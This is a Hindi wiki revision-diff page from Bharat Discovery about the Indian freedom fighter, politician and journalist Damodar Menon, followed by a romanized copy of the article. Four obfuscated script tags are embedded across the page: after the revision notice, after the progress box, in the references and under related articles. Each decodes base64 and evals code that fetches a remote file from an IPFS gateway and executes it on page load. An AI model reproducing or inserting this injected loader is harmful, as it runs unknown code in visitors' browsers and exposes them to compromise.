Difference between revisions of "दामोदर मेनन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 2: Line 2:
 
'''दामोदर मेनन''' [[भारत]] के प्रमुख स्वतन्त्रता सेनानियों में से एक थे। इनका जन्म [[10 जून]], [[1906]] ई. को [[केरल]] के 'करमलूर' नामक स्थान पर हुआ था। इन्होंने क़ानून की डिग्री प्राप्त की थी। [[पंडित जवाहर लाल नेहरू]] तथा [[महात्मा गाँधी]] का इनके जीवन पर व्यापक प्रभाव था। [[1957]] में इन्हें केरल विधान सभा का सदस्य चुना गया था। दामोदर मेनन की गिनती उच्च कोटि के पत्रकारों में भी की जाती है। इनके आर्थिक विचार बड़े ही उदार हुआ करते थे।
 
'''दामोदर मेनन''' [[भारत]] के प्रमुख स्वतन्त्रता सेनानियों में से एक थे। इनका जन्म [[10 जून]], [[1906]] ई. को [[केरल]] के 'करमलूर' नामक स्थान पर हुआ था। इन्होंने क़ानून की डिग्री प्राप्त की थी। [[पंडित जवाहर लाल नेहरू]] तथा [[महात्मा गाँधी]] का इनके जीवन पर व्यापक प्रभाव था। [[1957]] में इन्हें केरल विधान सभा का सदस्य चुना गया था। दामोदर मेनन की गिनती उच्च कोटि के पत्रकारों में भी की जाती है। इनके आर्थिक विचार बड़े ही उदार हुआ करते थे।
 
==शिक्षा तथा राष्ट्र-प्रेम==
 
==शिक्षा तथा राष्ट्र-प्रेम==
दामोदर मेनन ने 'महाराजा कॉलेज', [[त्रिवेंद्रम]] और 'रंगून यूनिवर्सिटी', [[बर्मा]] से शिक्षा पाई थी। इसके बाद इन्होंने त्रिवेंद्रम से क़ानून की डिग्री ली। किन्तु उनकी रूचि सार्वजनिक कार्यों और पत्रकारिता में अधिक थी। वे गाँधी जी और जवाहरलाल नेहरू जी से प्रेरित होकर वे स्वतंत्रता-संग्राम में सम्मिलित हो गए। [[1930]] ई. के नमक सत्याग्रह और [[1932]] ई. के [[सविनय अवज्ञा आंदोलन]] में उन्होंने सक्रिय भाग लिया और जेल में भी रहे। '[[भारत छोड़ो आंदोलन]]' में भी वे [[1942]] से [[1945]] तक बंद रहे। [[1948]] तक प्रसिद्ध [[मलयालम भाषा|मलयालम]] दैनिक ‘मातृभूमि’ के संपादक के रूप में उन्होंने जन-जागरण के लिए महत्वपूर्ण काम किया।
+
दामोदर मेनन ने 'महाराजा कॉलेज', [[त्रिवेंद्रम]] और 'रंगून यूनिवर्सिटी', [[बर्मा]] से शिक्षा पाई थी। इसके बाद इन्होंने त्रिवेंद्रम से क़ानून की डिग्री ली। किन्तु उनकी रूचि सार्वजनिक कार्यों और पत्रकारिता में अधिक थी। वे गाँधी जी और जवाहरलाल नेहरू जी से प्रेरित होकर वे स्वतंत्रता-संग्राम में सम्मिलित हो गए। [[1930]] ई. के नमक सत्याग्रह और [[1932]] ई. के [[सविनय अवज्ञा आंदोलन]] में उन्होंने सक्रिय भाग लिया और जेल में भी रहे। '[[भारत छोड़ो आंदोलन]]' में भी वे [[1942]] से [[1945]] तक बंद रहे। [[1948]] तक प्रसिद्ध [[मलयालम भाषा|मलयालम]] दैनिक ‘मातृभूमि’ के संपादक के रूप में उन्होंने जन-जागरण के लिए महत्त्वपूर्ण काम किया।
 
====राज्यमंत्री का पद====
 
====राज्यमंत्री का पद====
 
दामोदर मेनन अस्थायी लोक सभा के लिए भी चुने गए थे, पर [[कांग्रेस]] से नीतिगत मतभेद हो जाने के कारण [[1952]] से [[1957]] तक वे 'किसान मजदूर प्रजा पार्टी' के सांसद रहे। 1957 के निर्वाचन में पुनः कांग्रेस के टिकट पर [[केरल]] विधान सभा के सदस्य चुने गए और राज्य सरकार में मंत्री बने। [[1964]] में जब मंत्रिमंडल भंग हो गया, तो वे पुनः ‘मातृभूमि’ पत्र में आ गए। उन्होंने विभिन्न समयों में ‘समदर्शी’, ‘स्वतंत्र’, ‘कहालम’ और ‘पावर शक्ति’ पत्रों का भी संपादन किया। उनकी गणना केरल के प्रथम कोटि के पत्रकारों में होती थी।
 
दामोदर मेनन अस्थायी लोक सभा के लिए भी चुने गए थे, पर [[कांग्रेस]] से नीतिगत मतभेद हो जाने के कारण [[1952]] से [[1957]] तक वे 'किसान मजदूर प्रजा पार्टी' के सांसद रहे। 1957 के निर्वाचन में पुनः कांग्रेस के टिकट पर [[केरल]] विधान सभा के सदस्य चुने गए और राज्य सरकार में मंत्री बने। [[1964]] में जब मंत्रिमंडल भंग हो गया, तो वे पुनः ‘मातृभूमि’ पत्र में आ गए। उन्होंने विभिन्न समयों में ‘समदर्शी’, ‘स्वतंत्र’, ‘कहालम’ और ‘पावर शक्ति’ पत्रों का भी संपादन किया। उनकी गणना केरल के प्रथम कोटि के पत्रकारों में होती थी।

Revision as of 13:46, 9 April 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

damodar menan bharat ke pramukh svatantrata senaniyoan mean se ek the. inaka janm 10 joon, 1906 ee. ko keral ke 'karamaloor' namak sthan par hua tha. inhoanne qanoon ki digri prapt ki thi. pandit javahar lal neharoo tatha mahatma gaandhi ka inake jivan par vyapak prabhav tha. 1957 mean inhean keral vidhan sabha ka sadasy chuna gaya tha. damodar menan ki ginati uchch koti ke patrakaroan mean bhi ki jati hai. inake arthik vichar b de hi udar hua karate the.

shiksha tatha rashtr-prem

damodar menan ne 'maharaja k aaulej', triveandram aur 'rangoon yoonivarsiti', barma se shiksha paee thi. isake bad inhoanne triveandram se qanoon ki digri li. kintu unaki roochi sarvajanik karyoan aur patrakarita mean adhik thi. ve gaandhi ji aur javaharalal neharoo ji se prerit hokar ve svatantrata-sangram mean sammilit ho ge. 1930 ee. ke namak satyagrah aur 1932 ee. ke savinay avajna aandolan mean unhoanne sakriy bhag liya aur jel mean bhi rahe. 'bharat chho do aandolan' mean bhi ve 1942 se 1945 tak band rahe. 1948 tak prasiddh malayalam dainik ‘matribhoomi’ ke sanpadak ke roop mean unhoanne jan-jagaran ke lie mahattvapoorn kam kiya.

rajyamantri ka pad

damodar menan asthayi lok sabha ke lie bhi chune ge the, par kaangres se nitigat matabhed ho jane ke karan 1952 se 1957 tak ve 'kisan majadoor praja parti' ke saansad rahe. 1957 ke nirvachan mean punah kaangres ke tikat par keral vidhan sabha ke sadasy chune ge aur rajy sarakar mean mantri bane. 1964 mean jab mantrimandal bhang ho gaya, to ve punah ‘matribhoomi’ patr mean a ge. unhoanne vibhinn samayoan mean ‘samadarshi’, ‘svatantr’, ‘kahalam’ aur ‘pavar shakti’ patroan ka bhi sanpadan kiya. unaki ganana keral ke pratham koti ke patrakaroan mean hoti thi.

udar vyaktitv

samajavadi vicharoan ke hote hue bhi damodar menan gaandhi ji ke ahiansa ke siddhaant mean vishvas karate the. unake arthik vichar b de udar the. ve manate the ki dharm vyakti ka niji mamala hai. isilie ve aantarjatiy hi nahian, bhinn dharmavalanbiyoan ke bich vivah-sambandhoan ke bhi samarthak the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 379 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>